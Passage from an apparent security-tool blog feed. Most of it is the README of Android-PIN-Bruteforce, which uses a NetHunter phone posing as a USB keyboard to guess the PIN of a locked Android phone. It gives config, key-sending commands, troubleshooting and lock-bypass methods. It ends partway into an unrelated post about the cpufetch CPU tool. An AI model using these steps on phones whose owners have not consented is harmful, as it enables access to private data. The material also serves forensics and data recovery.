DELAY_BEFORE_STARTING is the period of time in seconds to wait before the bruteforce begins<br />DELAY_BEFORE_STARTING=2<br />## KEYS_BEFORE_STARTING config ures the keys that are sent before the bruteforce begins<br />KEYS_BEFORE_STARTING="enter"<br /></code></pre> <br /><b>Popups</b><br /> <p>We send keys before the end of the cooldown period, or optionally during the cooldown period. This is to keep the lockscreen app active and to dismiss any popups about the number of incorrect PIN attempts or a low battery warning.</p> <br /><span style="font-size: large;"><b>Test sending keys from the NetHunter phone</b></span><br /> <br /><b>Test sending keys from the terminal</b><br /> <p>Use ssh from your laptop to the NetHunter phone, and use this command to test sending keys:</p> <p>In this example, the enter key is sent.</p> <p><code>echo "enter" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>In this example, ctrl-escape is sent.</p> <p><code>echo "left-ctrl escape" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>Note: Sending combinations of keys in <code>config</code> file variables is different. Currently only <code>ctrl_escape</code> is supported.</p> <p>In this example, keys a, b, c are sent.</p> <p><code>echo a b c | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <br /><b>Test sending keys from an app</b><br /> <p>This Android app is a virtual USB Keyboard that you can use to test sending keys.</p> <p><a href="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/" rel="nofollow" target="_blank" title="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/">https://store.nethunter.com/en/packages/remote.hid.keyboard.client/</a></p> <br /><b>How to send special keys</b><br /> <p>Use this list for the following variables:</p> <ul> <li>KEYS_BEFORE_EACH_PIN</li> <li>KEYS_STAY_AWAKE_DURING_COOLDOWN</li> <li>KEYS_BEFORE_STARTING</li> </ul> <p>To send special keys use the following labels. This list can be found in the hid_gadget_test source code.</p> <table> <tr> <th>Key label</th> <th>Key label</th> </tr> <tr> <td>left-ctrl</td> <td>f6</td> </tr> <tr> <td>right-ctrl</td> <td>f7</td> </tr> <tr> <td>left-shift</td> <td>f8</td> </tr> <tr> <td>right-shift</td> <td>f9</td> </tr> <tr> <td>left-alt</td> <td>f10</td> </tr> <tr> <td>right-alt</td> <td>f11</td> </tr> <tr> <td>left-meta</td> <td>f12</td> </tr> <tr> <td>right-meta</td> <td>insert</td> </tr> <tr> <td>return</td> <td>home</td> </tr> <tr> <td>esc</td> <td>pageup</td> </tr> <tr> <td>bckspc</td> <td>del</td> </tr> <tr> <td>tab</td> <td>end</td> </tr> <tr> <td>spacebar</td> <td>pagedown</td> </tr> <tr> <td>caps-lock</td> <td>right</td> </tr> <tr> <td>f1</td> <td>left</td> </tr> <tr> <td>f2</td> <td>down</td> </tr> <tr> <td>f3</td> <td>kp-enter</td> </tr> <tr> <td>f4</td> <td>up</td> </tr> <tr> <td>f5</td> <td>num-lock</td> </tr> </table> <p>To send more than one key at the same time, use the following list:</p> <ul> <li>ctrl_escape (This sends left-ctrl and escape)</li> </ul> <p>If you need more key combinations please open a new issue in the GitHub issues list.</p> <br /><b>Customising the Progressive Cooldown</b><br /> <p>The following section of the <code>config</code> file controls the progressive cooldown.</p> <pre><code>## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br /></code></pre> <p>The array is the same as this table.</p> <table> <tr> <th>attempt number</th> <th>attempts until cooldown</th> <th>cooldown</th> </tr> <tr> <td>1</td> <td>5</td> <td>30</td> </tr> <tr> <td>11</td> <td>1</td> <td>30</td> </tr> <tr> <td>41</td> <td>1</td> <td>60</td> </tr> </table> <br /><b>Why can't you use a laptop?</b><br /> <p>This works from an Android phone because the USB ports are not bidirectional, unlike the ports on a laptop.</p> <br /><b>How Android emulates a keyboard</b><br /> <p>Keys are sent using <code>/system/xbin/hid-keyboard</code>. To test this and send the key 1 you can use <code>echo 1 | /system/xbin/hid-keyboard dev/hidg0 keyboard</code></p> <p>In Kali Nethunter, <code>/system/xbin/hid-keyboard</code> is a compiled copy of <code>hid_gadget_test.c</code>. This is a small program for testing the HID gadget driver that is included in the Linux Kernel. The source code for this file can be found at <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> and <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a>.</p> <br /><span style="font-size: large;"><b><div></div> Troubleshooting</b></span><br /> <br /><b>If it is not bruteforcing PINs</b><br /> <br /><b>Check the orientation of the cables</b><br /> <p>The Nethunter phone should have a regular USB cable attached, while the locked phone should have an OTG adaptor attached.</p> <p>The OTG cable should be connected to the locked Android phone. The regular USB cable should be connected to the Nethunter phone.</p> <p>Refer to the graphic on how to connect the phones.</p> <br /><b>Check it is emulating a keyboard</b><br /> <p>You can verify that the NetHunter phone is succesfully emulating a keyboard by connecting it to a computer using a regular charging/data USB cable. Open a text editor like Notepad while it is cracking and you should see it entering PIN numbers into the text editor.</p> <p>Note that you will not need an OTG cable for this.</p> <br /><b>Try restarting the phones</b><br /> <p>Try powering off the phones and even taking out the batteries if that is possible.</p> <br /><b>Try new cables</b><br /> <p>Try using new cables/adaptors as you may have a faulty cable/adaptor.</p> <br /><b>If it doesn't unlock the phone with a correct PIN</b><br /> <p>You might be sending keys too fast for the phone to process. Increase the DELAY_BETWEEN_KEYS variable in the config file. </p><div></div> If you don't see 4 dots come up on the phone's screen then maybe it is not receiving 4 keys. <br /><b><div></div> Managing Power Consumption</b><br /> <p>If your phone runs out of power too soon, follow these steps:</p> <ul> <li>Make sure both phones are fully charged to 100% before you begin</li> <li>Reduce the screen brightness on both the victim phone and NetHunter phone if possible</li> <li>Place both phones into Airplane mode, however you may want to enable WiFi to access the NetHunter phone via SSH.</li> <li>The locked phone will power the NetHunter phone, because it appears as a keyboard accessory</li> <li>Use a USB OTG cable with a Y splitter for an external power supply, to allow charging of the NetHunter phone while cracking</li> <li>Take breaks to charge your devices. Pause the script with CTRL-Z and resume with the <code>fg</code> shell command.</li> <li>Avoid the SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS configuration option. This will cause the locked phone to use more battery to keep the screen powered. Instead use the SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END option (Default).</li> </ul> <br /><b>Check the Diagnostics Report</b><br /> <p>Use the command <code>diag</code> display diagnostic information.</p> <p><code>bash ./android-pin-bruteforce diag</code></p> <p>If you receive this message when the USB cable is plugged in then try taking the battery out of the locked Android phone and power cycling it.</p> <p><code>[FAIL] HID USB device not ready. Return code from /system/xbin/hid-keyboard was 5.</code></p> <br /><b>How the usb-devices command works</b><br /> <p>The diagnostics command uses the <code>usb-devices</code> script but it is only necessary as part of determining whether the USB cables are incorrectly connected. This can be downloaded from <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Use verbose output</b><br /> <p>Use the <code>--verbose</code> option to check the configuration is as expected. This is especially useful when you are modifying the configuration.</p> <br /><b>Use the dry-run</b><br /> <p>Use the <code>--dry-run</code> option to check how it operates without sending any keys to a device. This is especially useful when you are modifying the configuration or during development.</p> <p>Dry run will:</p> <ul> <li>Not send any keys</li> <li>Will continue instead of aborting if the <code>KEYBOARD_DEVICE</code> or <code>HID_KEYBOARD</code> is missing.</li> </ul> <br /><b>HID USB Mode</b><br /> <p>Try this command in a shell on the NetHunter phone: <code>/system/bin/setprop sys.usb.config hid</code></p> <br /><span style="font-size: large;"><b><div></div> Known Issues</b></span><br /> <ul> <li>This cannot detect when the correct PIN is guessed and the phone unlocks.</li> <li>Your phones may run out of <div></div> battery before the correct PIN is found.</li> <li>Don't trust phone configuration files from unknown sources without reviewing them first. The configuration files are shell scripts and could include malicious commands.</li> </ul> <br /><span style="font-size: large;"><b><div></div> Roadmap</b></span><br /> <ul> <li>[DONE] Works</li> <li>[DONE] Detects USB HID failures</li> <li>[DONE] Improve Usage and commandline options/config files</li> <li>[DONE] Add bruteforce for n digit PINs</li> <li>[DONE] Mask for known digits</li> <li>[DONE] Crack PIN list in reverse (to find which recent PIN unlocked the device)</li> <li>[DONE] Implement configurable lockscreen prompt</li> <li>[DONE] Implement cooldown change after 10 attempts</li> <li>[WORKING] Find/test more devices to bruteforce</li> <li>Add progress bar</li> <li>Add ETA</li> <li>ASCII art</li> <li>Nicer GUI for NetHunter</li> <li>Implement for iPhone</li> <li>Detect when a phone is unlocked (Use Nethunter camera as a sensor?)</li> <li>Crack Android Patterns (try common patterns first)</li> </ul> <br /><span style="font-size: large;"><b><div></div> Contributing</b></span><br /> <p>Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.</p> <p>Please make sure to update tests as appropriate.</p> <br /><span style="font-size: large;"><b><div></div> Authors and acknowledgment</b></span><br /> <p>Developed by Andrew Horton (@urbanadventurer).</p> <p></p><div></div> The following people have been very helpful: <ul> <li>Vlad Filatov (@v1adf): Testing many phones for the Wiki Phone Database</li> </ul> <br /><b>Motivation</b><br /> <p>My original motivation to develop this was to unlock a Samsung S5 Android phone. It had belonged to someone who had passed away, and their family needed access to the data on it. As I didn't have a USB <a href="https://www.kitploit.com/search/label/Rubber%20Ducky" target="_blank" title="Rubber Ducky">Rubber Ducky</a> or any other hardware handy, I tried using a variety of methods, and eventually realised I had to develop something new.</p> <br /><b>Credit</b><br /> <p>The optimised PIN list is from Justin Engler (@justinengler) & Paul Vines from Senior Security Engineer, iSEC Partners and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO).">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO).</a>.</p> <br /><b>Graphics</b><br /> <p>Designed by Andrew Horton and gratefully using these free vector packs:</p> <ul> <li><a href="https://www.vecteezy.com/vector-art/159576-usb-ports-isometric-free-vector" rel="nofollow" target="_blank" title="USB Ports Isometric Free Vector by VisionHeldup">USB Ports Isometric Free Vector by VisionHeldup</a></li> <li><a href="https://www.vecteezy.com/vector-art/107006-hdmi-and-usb-vector-set" rel="nofollow" target="_blank" title="HDMI and USB Vector Set by Mary Winkler">HDMI and USB Vector Set by Mary Winkler</a></li> <li><a href="https://www.vecteezy.com/vector-art/661831-isometric-data-security-illustration" rel="nofollow" target="_blank" title="Isometric Data Security Illustration by Rizal.Medanguide">Isometric Data Security Illustration by Rizal.Medanguide</a></li> <li>Kali NetHunter Logo</li> </ul> <br /><span style="font-size: large;"><b><div></div> Comparison with other projects and methods to unlock a locked Android phone</b></span><br /> <br /><b>What makes this project unique?</b><br /> <p>I've been asked what makes this project unique when there are other open-source Android PIN cracking projects.</p> <p>Android-PIN-Bruteforce is unique because it cracks the PIN on Android phones from a NetHunter phone and it doesn't need the locked phone to be pre-hacked.</p> <p>It works:</p> <ul> <li>Without having to buy special hardware, such as a Rubber Ducky, Celebrite, or XPIN Clip.</li> <li>Without ADB or root access (the phone doesn't have to be pre-hacked).</li> </ul> <table> <tr> <th>Project</th> <th>ADB/USB Debugging</th> <th>Requires root</th> <th>Requires $ hardware</th> <th>Commercial</th> </tr> <tr> <td><div>⭐</div> Android-PIN-Bruteforce</td> <td>No</td> <td>No</td> <td>Nethunter phone</td> <td>No</td> </tr> <tr> <td>github.com/PentesterES/AndroidPINCrack</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/ByteRockstar1996/Cracking-Android-Pin-Lock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/sch3m4/androidpatternlock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/georgenicolaou/androidlockcracker</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/MGF15/P-Decode</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/BitesFor/ABL</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/wuseman/WBRUTER</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/Gh005t/Android-BruteForce</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/mandatoryprogrammer/droidbrute</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>No</td> </tr> <tr> <td>github.com/hak5darren/USB-Rubber-Ducky</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>Yes</td> </tr> <tr> <td>github.com/bbrother/stm32f4androidbruteforce</td> <td>No</td> <td>No</td> <td>STM32F4 dev board $</td> <td>No</td> </tr> <tr> <td>hdb-team.com/product/hdbox/</td> <td>No</td> <td>No</td> <td>HDBOX $$</td> <td>Yes</td> </tr> <tr> <td>xpinclip.com</td> <td>No</td> <td>No</td> <td>XPINClip $$</td> <td>Yes</td> </tr> <tr> <td>cellebrite.com/en/ufed/</td> <td>No</td> <td>No</td> <td>Cellebrite UFED $$$</td> <td>Yes</td> </tr> </table> <p>Some of these projects/products are really awesome but they achieve a different goal to Android-PIN-Bruteforce.</p> <p>If a project requires a gestures.key or password.key, I've listed it as requiring root. If a project requires a custom bootloader, I've listed that as requiring both ADB and root. If you would like your project listed in this table then please open a new issue. There are links to each of these projects in the </p><div></div> Related Projects & Futher Reading section. <br /><b><div></div> Regular phone users</b><br /> <ul> <li>Try the top 20 PINs from the <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="DataGenetics PIN analysis">DataGenetics PIN analysis</a> that apparently unlocks 26.83% of phones.</li> <li>Use an SMS lock-screen bypass app (requires app install before phone is locked)</li> <li>Use Samsung Find My Mobile (requires you set it up before phone is locked)</li> <li>Crash the Lock Screen UI (Android 5.0 and 5.1)</li> <li>Use the Google Forgot pattern, Forgot PIN, or Forgot password (Android 4.4 KitKat and earlier)</li> <li>Factory Reset (you lose all your data</li> </ul> <b><div><br /></div> Users who have already replaced their Android ROM</b><br /> <p>If the phone has already been rooted, has USB debugging enabled, or has adb enabled.</p> <ul> <li>Flash the <code>Pattern Password Disable</code> ZIP using a custom recovery (Requires TWRP, CMW, Xrec, etc.)</li> <li>Delete <code>/data/system/gesture.key</code> or <code>password.key</code> (requires root and adb on locked device)</li> <li>Crack <code>/data/system/gesture.key</code> and <code>password.key</code> (requires root and adb on locked device)</li> <li>Update sqlite3 database <code>settings.db</code> (requires root and adb on locked device)</li> </ul> <br /><b><div></div> Forensic Investigators</b><br /> <p>These methods can be expensive and are usually only used by specialised phone forensic investigators.</p> <p>In order of difficulty and expense:</p> <ul> <li>Taking advantage of USB debugging being enabled (Oxygen Forensic Suite)</li> <li>Bruteforce with keyboard emulation (<div>⭐</div> Android-PIN-Bruteforce, RubberDucky attack, XPIN Clip, HBbox)</li> <li>JTAG (Interface with TAPs (Test Access Ports) on the device board)</li> <li>In-System Programming (ISP) (Involves directly connecting to pins on flash memory chips on the device board)</li> <li>Chip Off (Desolder and remove flash memory chips from the device)</li> <li>Clock Glitching / Voltage <a href="https://www.kitploit.com/search/label/Fault%20Injection" target="_blank" title="Fault Injection">Fault Injection</a> (Hardware CPU timing attacks to bypass PIN restrictions)</li> <li>Bootloader exploits (Zero-day exploits that attack the bootloader. GrayKey from Grayshift and Cellebrite)</li> </ul> <p>JTAG, ISP, and Chip Off techniques are less useful now because most devices are encrypted. I don't know of any practical attacks on phone PINs that use clock glitching, if you know of a product that uses this technique please let me know so I can include it.</p><p><span style="font-weight: bold;"></span></p><b> Security Professionals and Technical Phone Users</b><br /> <p>Use the USB HID Keyboard Bruteforce with some dedicated hardware.</p> <ul> <li>A RubberDucky and Darren Kitchen's Hak5 brute-force script</li> <li>Write a script for a USB Teensy</li> <li>Buy expensive forensic hardware</li> <li>Or you can use Android-PIN-Bruteforce with your NetHunter phone!</li> </ul> <p>Attempts to use an otherwise awesome project Duck Hunter, to emulate a RubberDucky payload for Android PIN cracking did not work. It crashed the phone probably because of the payload length.</p><p><br /></p><span style="font-size: large;"><b> Related Projects & Futher Reading</b></span><br /> <br /><b>USB HID Hardware without NetHunter</b><br /> <p>hak5 12x17: Hack Any 4-digit Android PIN in 16 hours with a USB Rubber Ducky <a href="https://archive.org/details/hak5_12x17" rel="nofollow" target="_blank" title="https://archive.org/details/hak5_12x17">https://archive.org/details/hak5_12x17</a></p> <p>Hak5: USB Rubber Ducky <a href="https://shop.hak5.org/products/usb-rubber-ducky-deluxe" rel="nofollow" target="_blank" title="https://shop.hak5.org/products/usb-rubber-ducky-deluxe">https://shop.hak5.org/products/usb-rubber-ducky-deluxe</a></p> <p>USB-Rubber-Ducky Payloads <a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads" rel="nofollow" target="_blank" title="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads">https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads</a></p> <p>Teensy <a href="https://www.pjrc.com/teensy/" rel="nofollow" target="_blank" title="https://www.pjrc.com/teensy/">https://www.pjrc.com/teensy/</a></p> <p>Brute Forcing An Android Phone with a STM32F4Discovery Development Board <a href="https://github.com/bbrother/stm32f4androidbruteforce" rel="nofollow" target="_blank" title="https://github.com/bbrother/stm32f4androidbruteforce">https://github.com/bbrother/stm32f4androidbruteforce</a> <a href="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/" rel="nofollow" target="_blank" title="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/">https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/</a></p> <p>Automated brute force attack against the Mac EFI PIN (Using a Teensy) <a href="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html" rel="nofollow" target="_blank" title="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html">https://orvtech.com/atacar-efi-pin-macbook-pro-en.html</a> <a href="https://hackaday.io/project/2196-efi-bruteforcer" rel="nofollow" target="_blank" title="https://hackaday.io/project/2196-efi-bruteforcer">https://hackaday.io/project/2196-efi-bruteforcer</a></p> <p>Droidbrute: An Android PIN cracking USB rubber ducky payload made efficient with a statistically generated wordlist. <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>Discussion forum about the hak5 episode, and Android Brute Force 4-digit pin <a href="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/" rel="nofollow" target="_blank" title="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/">https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/</a></p> <br /><b>NetHunter HID keyboard attacks</b><br /> <p>NetHunter HID Keyboard Attacks <a href="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/" rel="nofollow" target="_blank" title="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/">https://www.kali.org/docs/nethunter/nethunter-hid-attacks/</a></p> <br /><b>Linux Kernel HID support</b><br /> <p>Human Interface Devices (HID) <a href="https://www.kernel.org/doc/html/latest/hid/index.html#" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/hid/index.html#">https://www.kernel.org/doc/html/latest/hid/index.html#</a></p> <p>Linux USB HID gadget driver and hid-keyboard program <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a></p> <p>The usb-devices script <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Cracking Android PIN and Pattern files</b><br /> <p>AndroidPINCrack - bruteforce the Android Passcode given the hash and salt (requires root on the phone) <a href="https://github.com/PentesterES/AndroidPINCrack" rel="nofollow" target="_blank" title="https://github.com/PentesterES/AndroidPINCrack">https://github.com/PentesterES/AndroidPINCrack</a></p> <p>Android Pattern Lock Cracker - bruteforce the Android Pattern given an SHA1 hash (requires root on the phone) <a href="https://github.com/sch3m4/androidpatternlock" rel="nofollow" target="_blank" title="https://github.com/sch3m4/androidpatternlock">https://github.com/sch3m4/androidpatternlock</a></p> <br /><b>General Recovery Methods</b><br /> <p>[Android][Guide]Hacking And Bypassing Android Password/Pattern/Face/PI <a href="https://forum.xda-developers.com/showthread.php?t=2620456" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/showthread.php?t=2620456">https://forum.xda-developers.com/showthread.php?t=2620456</a></p> <p>Android BruteForce using ADB & Shell Scripting <a href="https://github.com/Gh005t/Android-BruteForce" rel="nofollow" target="_blank" title="https://github.com/Gh005t/Android-BruteForce">https://github.com/Gh005t/Android-BruteForce</a></p> <br /><b>Forensic Methods and Hardware</b><br /> <p>PATCtech Digital Forensics: Getting Past the Android Passcode <a href="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf" rel="nofollow" target="_blank" title="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf">http://patc.com/online/a/Portals/965/Android%20Passcode.pdf</a></p> <p>XPIN Clip <a href="https://xpinclip.com/" rel="nofollow" target="_blank" title="https://xpinclip.com/">https://xpinclip.com/</a></p> <p>HDBox from HDB Team <a href="https://hdb-team.com/product/hdbox/" rel="nofollow" target="_blank" title="https://hdb-team.com/product/hdbox/">https://hdb-team.com/product/hdbox/</a></p> <p>Cellebrite UFED <a href="https://www.cellebrite.com/en/ufed/" rel="nofollow" target="_blank" title="https://www.cellebrite.com/en/ufed/">https://www.cellebrite.com/en/ufed/</a></p> <p>GrayKey from Grayshift <a href="https://www.grayshift.com/graykey/" rel="nofollow" target="_blank" title="https://www.grayshift.com/graykey/">https://www.grayshift.com/graykey/</a></p> <br /><b>PIN Analysis</b><br /> <p>Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO) <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler">https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler</a></p> <p>DataGenetics PIN analysis <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="https://datagenetics.com/blog/september32012/index.html">https://datagenetics.com/blog/september32012/index.html</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/urbanadventurer/Android-PIN-Bruteforce" rel="nofollow" target="_blank" title="Download Android-PIN-Bruteforce">Download Android-PIN-Bruteforce</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-90971200952837208472021-04-11T17:30:00.027-04:002021-04-11T17:30:00.710-04:00Cpufetch - Simplistic Yet Fancy CPU Architecture Fetching Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gW4iYIx5CtU/YGvhCi0WHtI/AAAAAAAAV0w/BVU7TtULfJ4WX32_09My7WRrmnWotrnfgCNcBGAsYHQ/s1119/cpufetch_7_i9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="1119" height="224" src="https://1.bp.blogspot.com/-gW4iYIx5CtU/YGvhCi0WHtI/AAAAAAAAV0w/BVU7TtULfJ4WX32_09My7WRrmnWotrnfgCNcBGAsYHQ/w640-h224/cpufetch_7_i9.png" width="640" /></a></div><p><br /></p><p>Simplistic yet fancy CPU architecture fetching tool</p><span><a name='more'></a></span><p><br /></p><span style="font-size: x-large;"><b>1. Support</b></span><br /> <p>cpufetch currently supports x86_64 CPUs (both Intel and AMD) and ARM.</p> <table> <tr> <th align="center">Platform</th> <th align="center">x86_64</th> <th align="center">ARM</th> <th align="center">Notes</th> </tr> <tr> <td align="center">Linux</td> <td align="center"><div>✔️</div></td> <td align="center"><div>✔️</div></td> <td align="center">Prefered platform. <br /> Experimental ARM support</td> </tr> <tr> <td align="center">Windows</td> <td align="center"><div>✔️</div></td> <td align="center"><div>❌</div></td> <td align="center">Some information may be missing. <br /> Colors will be used if supported</td> </tr> <tr> <td align="center">Android</td> <td align="center"><div>❗</div></td> <td align="center"><div>✔️</div></td> <td align="center">Experimental ARM support</td> </tr> <tr> <td align="center">macOS</td> <td align="center"><div>✔️</div></td> <td align="center"><div>❌</div></td> <td align="center">Some information may be missing</td> </tr> </table> <table> <tr> <th align="center">Emoji</th> <th align="center">Meaning</th> </tr> <tr> <td align="center"><div>✔️</div></td> <td align="center">Supported</td> </tr> <tr> <td align="center"><div>❌</div></td> <td align="center">Not supported</td> </tr> <tr> <td align="center"><div>❗</div></td> <td align="center">Not tested</td> </tr> </table> <br /><span style="font-size: x-large;"><b>2. Installation</b></span><br /> <br /><span style="font-size: large;"><b>2.1 Building from source</b></span><br /> <p>Just clone the repo and use <code>make</code> to compile it</p> <pre><code>git clone https://github.com/Dr-Noob/cpufetch<br />cd cpufetch<br />make<br />./cpufetch<br /></code></pre> <p>The Makefile is designed to work on Linux, <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and macOS.</p> <br /><span style="font-size: large;"><b>2.2 Linux</b></span><br /> <p>There is a cpufetch package available in <a href="https://www.kitploit.com/search/label/Arch%20Linux" target="_blank" title="Arch Linux">Arch Linux</a> (<a href="https://aur.archlinux.org/packages/cpufetch-git" rel="nofollow" target="_blank" title="cpufetch-git">cpufetch-git</a>). If you are in another distribution, you can build <code>cpufetch</code> from source.</p> <br /><span style="font-size: large;"><b>2.2 Windows</b></span><br /> <p>In the <a href="https://github.com/Dr-Noob/cpufetch/releases" rel="nofollow" target="_blank" title="releases">releases</a> section you will find some cpufetch executables compiled for Windows. Just download and run it from Windows CMD. You can also build <code>cpufetch</code> from source.</p> <br /><span style="font-size: large;"><b>2.3 macOS</b></span><br /> <p>You need to build <code>cpufetch</code> from source.</p> <br /><span style="font-size: large;"><b>2.4 Android</b></span><br /> <ol> <li>Install <code>termux</code> app (terminal emulator)</li> <li>Run <code>pkg install -y git make clang</code> inside termux.</li> <li>Build from source normally:</li> </ol> <ul> <li>git clone <a href="https://github.com/Dr-Noob/cpufetch" rel="nofollow" target="_blank" title="https://github.com/Dr-Noob/cpufetch">https://github.com/Dr-Noob/cpufetch</a></li> <li>cd cpufetch</li> <li>make</li> <li>./cpufetch</li> </ul> <br /><span style="font-size: x-large;"><b>3. Examples</b></span><br /> <p>Here are more examples of how <code>cpufetch</code> looks on different CPUs.</p> <br /><span style="font-size: large;"><b>3.1 x86_64 CPUs</b></span><br /> <p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-fFmkaqMp5qM/YGvhKvuE5_I/AAAAAAAAV04/1cxvYR0awmEHVHpfc1ZRPb6878gF941zwCNcBGAsYHQ/s1033/cpufetch_8_epyc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="396" data-original-width="1033" height="246" src="https://1.bp.blogspot.com/-fFmkaqMp5qM/YGvhKvuE5_I/AAAAAAAAV04/1cxvYR0awmEHVHpfc1ZRPb6878gF941zwCNcBGAsYHQ/w640-h246/cpufetch_8_epyc.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BoCNiF_Mqg8/YGvhKiEovqI/AAAAAAAAV00/RlkLaqx5wAoGfy2RTAfdhbg4EO_qiqL4wCNcBGAsYHQ/s1107/cpufetch_9_cascade_lake.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1107" height="230" src="https://1.bp.blogspot.com/-BoCNiF_Mqg8/YGvhKiEovqI/AAAAAAAAV00/RlkLaqx5wAoGfy2RTAfdhbg4EO_qiqL4wCNcBGAsYHQ/w640-h230/cpufetch_9_cascade_lake.png" width="640" /></a></div><br /><p></p><span style="font-size: large;"><b>3.2 ARM CPUs</b></span><br /> <p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-liHK00gR8qM/YGvhQARp_UI/AAAAAAAAV1A/ouY0-MaMm7ICBCsrfvpCeS0F2BGlAcK1gCNcBGAsYHQ/s1173/cpufetch_11_snapdragon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1173" height="218" src="https://1.bp.blogspot.com/-liHK00gR8qM/YGvhQARp_UI/AAAAAAAAV1A/ouY0-MaMm7ICBCsrfvpCeS0F2BGlAcK1gCNcBGAsYHQ/w640-h218/cpufetch_11_snapdragon.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a 